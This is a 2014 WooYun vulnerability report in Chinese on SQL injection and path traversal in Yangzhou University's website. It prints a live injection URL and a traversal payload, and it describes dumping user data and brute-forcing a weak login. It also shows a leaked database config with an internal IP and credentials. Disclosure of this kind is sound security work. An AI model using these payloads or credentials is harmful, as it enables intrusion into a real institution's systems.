当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-062336

漏洞标题:扬州大学官网jsp-Oracle注入漏洞

相关厂商:扬州大学

漏洞作者: 动后河

提交时间:2014-05-29 18:09

修复时间:2014-06-03 18:10

公开时间:2014-06-03 18:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-29: 细节已通知厂商并且等待厂商处理中
2014-06-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

好几个月了,都没修复,我身为...义不容辞。
不知道小扬大有没有人来处理,不过jcms的xml上传目录不能执行jsp的,这么危险小了点。
是个扫描器就能扫描出来,我已经试过3个老中青型号的扫描器了
官网服务器上还有大量网站,不乐观啊。

详细说明:

http://www.yzu.edu.cn:80/vc/vc/interface/styletop/sitecount_interface.jsp?i_id=7
这个链接就有注入,还有一个wvs扫出的,没有试。

 2014-05-25 下午11.53.32.png


 2014-05-25 下午11.54.14.png


 2014-05-25 下午11.54.33.png


然后找到用户的表,拖下来

漏洞证明:

拖下来后,没截图,(实际上拖下来的我早已经删了,反正没什么大用)
不知道密码加密是怎么,base64吗?没解出来。不过,有用户名,那就暴力了
虽然www.yzu.edu.cn/jcms有验证码,但www.yzu.edu.cn/vc没有,可以暴力了。
解出来一个:wewe 密码 123456
根据 WooYun: 大汉通版jcms任意文件上传漏洞 这个漏洞
登上jcms,利用上传xml的漏洞,但jsp文件上传不成功,并且看样子jsp也不能执行
不过传个html的黑页也不错,胆小就不试了。
zone有说过,只能html的话,那也可以跨站,也不试了吧。
jcms的某个洞读取数据库配置
http://www.yzu.edu.cn/jcms/workflow/design/readxml.jsp?flowcode=../../../WEB-INF/config/dbconfig
<something-else-entirely>
<proxool>
<alias>1</alias>
<driver-url>jdbc:oracle:thin:@10.241.0.34:1521:orcyzu</driver-url>
<driver-class>oracle.jdbc.driver.OracleDriver</driver-class>
<driver-properties>
<property name="user" value="jcms"/>
<property name="password" value="jcms_yzu"/>
</driver-properties>
<minimum-connection-count>10</minimum-connection-count>
<maximum-connection-count>30</maximum-connection-count>
<house-keeping-test-sql>select CURRENT_DATE</house-keeping-test-sql>
<dbtype>oracle</dbtype>
</proxool>
</something-else-entirely>
主站呐!官网呐!有注入呐!太丢人了吧!

修复方案:

过滤

版权声明:转载请注明来源 动后河@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-06-03 18:10

厂商回复:

最新状态:

暂无


漏洞评价:

评论